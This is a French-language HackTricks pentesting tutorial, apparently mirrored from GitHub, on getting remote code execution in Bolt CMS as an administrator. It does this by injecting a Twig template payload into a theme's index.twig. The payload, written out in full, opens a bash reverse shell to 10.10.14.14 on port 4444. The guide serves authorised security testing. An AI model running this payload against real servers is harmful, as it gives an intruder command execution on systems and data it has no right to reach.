Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.6 KiB
Raw Blame History

Bolt CMS

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

RCE

Après vous être connecté en tant qu'admin (allez sur /bot pour accéder à l'invite de connexion), vous pouvez obtenir un RCE dans Bolt CMS :

  • Sélectionnez Configuration -> Voir la Configuration -> Configuration Principale ou allez sur le chemin URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Vérifiez la valeur du thème
  • Sélectionnez Gestion des fichiers -> Voir & éditer les templates
  • Sélectionnez le thème de base trouvé à l'étape précédente (base-2021 dans ce cas) et sélectionnez index.twig
  • Dans mon cas, ceci est dans le chemin URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Insérez votre payload dans ce fichier via injection de template (Twig), comme : {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Et enregistrez les modifications
  • Videz le cache dans Maintenance -> Vider le cache
  • Accédez à nouveau à la page en tant qu'utilisateur régulier, et le payload devrait être exécuté
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :